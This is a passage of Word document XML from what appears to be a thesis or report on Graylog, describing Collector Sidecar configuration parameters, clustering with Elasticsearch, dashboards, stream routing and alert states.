          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>Name of the Sidecar instance, will also show up in the web interface. Hostname will be used if not set.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA77C6" w:rsidTr="00EA77C6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>collector_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>Unique ID (UUID) of the instance. This can be a string or a path to an ID file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA77C6" w:rsidTr="00EA77C6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:lastRenderedPageBreak/>
              <w:t>log_path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>A path to a directory where the Sidecar can store the output of each running collector backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA77C6" w:rsidTr="00EA77C6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>log_rotation_time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>Rotate the stdout and stderr logs of each collector after X seconds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA77C6" w:rsidTr="00EA77C6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>log_max_age</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>Delete rotated log files older than Y seconds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA77C6" w:rsidTr="00EA77C6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>tags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>List of configuration tags. All configurations on the server side that match the tag list will be fetched and merged by this instance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA77C6" w:rsidTr="00EA77C6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>backends</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00F95A3B">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>A list of collector backends the user wants to run on the target host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F95A3B" w:rsidRPr="00F95A3B" w:rsidRDefault="00F95A3B" w:rsidP="00F95A3B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc485303803"/>
      <w:r w:rsidRPr="00F95A3B">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7</w:t>
      </w:r>
      <w:r w:rsidR="00A91688">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00F95A3B">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Graylog Collector Sidecar configuration parameters and their descriptions.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w:rsidR="00F95A3B" w:rsidRDefault="00F95A3B" w:rsidP="00F95A3B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00F95A3B">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidRPr="00F95A3B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>http://docs.graylog.org/en/2.2/pages/collector_sidecar.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007C5A92" w:rsidRDefault="007C5A92">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033426A" w:rsidRDefault="003371FE" w:rsidP="00A8226C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Graylog server can function individually, or can be </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>connect</w:t>
      </w:r>
      <w:r w:rsidR="00DD628B">
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> together</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> by configuring them to work in cluster environments. In cluster mode, Graylog servers </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>connect together</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> by using the operation of Rest API</w:t>
      </w:r>
      <w:r w:rsidR="0033426A">
        <w:t>, each server now becomes a node, and those nodes share information together. Each node own</w:t>
      </w:r>
      <w:r w:rsidR="00DD628B">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="0033426A">
        <w:t xml:space="preserve"> its MongoDB separately, but Elasticsearch servers now cluster together, and many Graylog servers can query their log simultaneously on one Elasticsearch server, or many Elasticsearch server at the same time. The figure below explains that theory in a graphical way.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033426A" w:rsidRDefault="0033426A" w:rsidP="0033426A">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E80265E" wp14:editId="7543C5FB">
            <wp:extent cx="5581650" cy="3936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3936365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033426A" w:rsidRPr="004E0912" w:rsidRDefault="0033426A" w:rsidP="0033426A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc483834786"/>
      <w:bookmarkStart w:id="60" w:name="_Toc485303769"/>
      <w:r w:rsidRPr="004E0912">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2</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10</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004E0912">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Graylog servers and Elasticsearch servers deployed in Cluster mode.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w:rsidR="0033426A" w:rsidRDefault="0033426A" w:rsidP="0033426A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E0912">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidRPr="004E0912">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>http://docs.graylog.org/en/2.2/pages/architecture.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="004E0912" w:rsidRPr="004E0912" w:rsidRDefault="004E0912" w:rsidP="004E0912"/>
    <w:p w:rsidR="003371FE" w:rsidRDefault="008D3B35" w:rsidP="008D3B35">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Displaying log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C5A92" w:rsidRPr="007C5A92" w:rsidRDefault="007C5A92" w:rsidP="00A8226C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="004E0912">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Using dashboards</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> allow Graylog to </w:t>
      </w:r>
      <w:r w:rsidR="004E0912">
        <w:t xml:space="preserve">manage pre-defined views on our log data to always show everything important that administrators </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004E0912">
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004E0912">
        <w:t xml:space="preserve"> get the eyes on. Dashboard supports many kinds for displaying the information without any effort for finding it in a bunch of data. Any data that we want to be shown will not only be shown up as plaintext, but it also can be parsed and graphically displayed by chart, table, statistic assumption and measurement. The amount of information grows by the flying of time, and it will </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004E0912">
        <w:t>gets</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004E0912">
        <w:t xml:space="preserve"> larger and larger until a point that no normal search effort in the bunch of everything can tell us where the information we need is lying. </w:t>
      </w:r>
      <w:r w:rsidR="004E0912">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">With the help of dashboard, system administrators those want to protect their network will receive information on time. They can immediately know what is happening to their system and can rapidly deduce a solution for protecting the system.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003371FE" w:rsidRDefault="008D3B35" w:rsidP="00A8226C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>An example dashboard is shown in the figure below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D3B35" w:rsidRDefault="008D3B35" w:rsidP="008D3B35">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FCD39C6" wp14:editId="6A9F8C4A">
            <wp:extent cx="5581650" cy="36302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3630295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D3B35" w:rsidRPr="008D3B35" w:rsidRDefault="008D3B35" w:rsidP="008D3B35">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc483834787"/>
      <w:bookmarkStart w:id="62" w:name="_Toc485303770"/>
      <w:r w:rsidRPr="008D3B35">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2</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11</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="008D3B35">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example of a dashboard.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w:rsidR="008D3B35" w:rsidRPr="008D3B35" w:rsidRDefault="008D3B35" w:rsidP="008D3B35">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3B35">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId38" w:history="1">
        <w:r w:rsidRPr="008D3B35">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>http://docs.graylog.org/en/2.2/pages/dashboards.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008D3B35" w:rsidRDefault="008D3B35" w:rsidP="00A8226C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008D3B35" w:rsidRDefault="008D3B35" w:rsidP="00A8226C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3B35">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Streaming and Alerting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F06FEA" w:rsidRDefault="009F4123" w:rsidP="00A8226C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53CB7">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Graylog streams</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are a mechanism to route messages into categories in realtime while they are processed </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1235779385"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION Gra2 \l 1033 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(17)</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="006A2017">
        <w:t>. When stream wants a message to be route to it, it define</w:t>
      </w:r>
      <w:r w:rsidR="00E53CB7">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="006A2017">
        <w:t xml:space="preserve"> a rule that any message which matches the rules will be route directly to the stream.</w:t>
      </w:r>
      <w:r w:rsidR="00E53CB7">
        <w:t xml:space="preserve"> Therefore, stream can be defined as a flow of messages those has similar content.  Streams are processed in realtime by the help of pipelines. </w:t>
      </w:r>
      <w:r w:rsidR="00763FEA">
        <w:t xml:space="preserve">Every message that comes in is matched against the rules of a stream. For message that match any or </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00763FEA">
        <w:t>all of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00763FEA">
        <w:t xml:space="preserve"> the stream rules, the internal ID of that stream is stored in the streams array of that processed message. Therefore, any analysis, searches or alerts that bound to streams can now simply check the stream array base on the stream ID.</w:t>
      </w:r>
      <w:r w:rsidR="00AC1E06">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F06FEA" w:rsidRDefault="00F06FEA">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F06FEA" w:rsidRDefault="00F06FEA" w:rsidP="00A8226C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The figure below graphical demonstrates that messages are processed in stream.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F06FEA" w:rsidRDefault="00AC1E06" w:rsidP="00F06FEA">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06FEA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5581650" cy="5628098"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="Picture 11" descr="../_images/internal_stream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internal_stream_processin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1650" cy="5628098"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F06FEA" w:rsidRPr="00F06FEA" w:rsidRDefault="00F06FEA" w:rsidP="00F06FEA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc483834788"/>
      <w:bookmarkStart w:id="64" w:name="_Toc485303771"/>
      <w:r w:rsidRPr="00F06FEA">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2</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12</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00F06FEA">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Messages are processed in stream.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w:rsidR="00E53CB7" w:rsidRDefault="00F06FEA" w:rsidP="00F06FEA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F06FEA">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r w:rsidRPr="00F06FEA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>http://docs.graylog.org/en/2.2/pages/streams.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007C596B" w:rsidRPr="00F95A3B" w:rsidRDefault="00F95A3B" w:rsidP="007C596B">
      <w:r>
        <w:t xml:space="preserve">Messages sent by collector agent to the Input interface of Graylog server, are driven to a filter chain in which messages are classified base on pre-defined rules. The stream rules are store in MongoDB server of Graylog, which are treated as configurations for stream processing. The message that have been route to stream, is tagged a stream ID that help </w:t>
      </w:r>
      <w:r w:rsidR="007C596B">
        <w:t>Graylog to easily find that message base on which stream it is belong to. The message, after being classified by stream, is route to output interface which is under management of Elasticsearch. Message can also be sent to other Graylog server or Elasticsearch server due to the cluster environment that Graylog are configured.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F06FEA" w:rsidRDefault="00F95A3B" w:rsidP="00F06FEA">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The crucial problem when processing messages is the time for classif</w:t>
      </w:r>
      <w:r w:rsidR="007C596B">
        <w:t>ying</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which message </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>has to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> be routed to which stream. </w:t>
      </w:r>
      <w:r w:rsidR="00D7500C">
        <w:t xml:space="preserve">Applying stream rules is done during the indexing of a message only, so the time spent for classifying message might become an overhead problem if it takes too long, which could lead to slow down the overall performance of Graylog system. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D192C" w:rsidRDefault="00D7500C" w:rsidP="004D192C">
      <w:r>
        <w:t xml:space="preserve">There could be any scenarios when a stream rule takes too long to match, therefore </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00EA3EC9">
        <w:t xml:space="preserve"> large</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> number of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> messages have to be waited</w:t>
      </w:r>
      <w:r w:rsidR="004D192C">
        <w:t xml:space="preserve">. The message processing can be stall, therefore, those waiting messages </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004D192C">
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004D192C">
        <w:t xml:space="preserve"> stand in the system memory, that could lead to the memory runs out and the whole system could become non-responsive. To prevent this, the runtime of stream rule matching is limited for it cannot make other messages wait for too long. </w:t>
      </w:r>
      <w:r w:rsidR="004D192C" w:rsidRPr="004D192C">
        <w:t xml:space="preserve">When it is taking longer than the configured runtime limit, the process of matching this message </w:t>
      </w:r>
      <w:r w:rsidR="00EA3EC9">
        <w:t>against</w:t>
      </w:r>
      <w:r w:rsidR="004D192C" w:rsidRPr="004D192C">
        <w:t xml:space="preserve"> the rules of this specific stream is aborted.</w:t>
      </w:r>
      <w:r w:rsidR="00EA3EC9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA3EC9" w:rsidRPr="00EA3EC9">
        <w:t>If the number of recorded faults for a single stream is higher than a configured threshold, the stream rule set of this stream is considered faulty and the stream is disabled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0486E" w:rsidRDefault="00C0486E" w:rsidP="004D192C">
      <w:r w:rsidRPr="00C0486E">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Graylog alerts base on stream</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Administrator can define conditions for triggering the alert based on the stream he is following. </w:t>
      </w:r>
      <w:r w:rsidR="004A1113">
        <w:t xml:space="preserve">Like stream, Graylog acts to alert on a stream base on rules </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-43907198"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="004A1113">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="004A1113">
            <w:instrText xml:space="preserve"> CITATION Gra3 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="004A1113">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="004A1113">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(18)</w:t>
          </w:r>
          <w:r w:rsidR="004A1113">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="004A1113">
        <w:t>. When a stream satisfies just one or all the rules (depends on how we define our rule’s conditions), Graylog trigger the alert process and sends alert message to administrators. An alert can have two states:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A1113" w:rsidRDefault="004A1113" w:rsidP="004A1113">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Unresolved: Alert has an unresolved state while the defined condition is satisfied. New alerts are triggered in this state, and they also execute the notifications attached to the stream. These alerts usually require action from administrator.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A1113" w:rsidRPr="00F06FEA" w:rsidRDefault="004A1113" w:rsidP="004A1113">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Resolved: </w:t>
      </w:r>
      <w:r w:rsidRPr="004A1113">
        <w:t>Graylog automatically resolves alerts once their alert condition is no longer satisfied. This is the final state of an alert, as Graylog will create a new alert if the alert condition is satisfied again in the future</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D073C" w:rsidRDefault="00872321" w:rsidP="00A8226C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
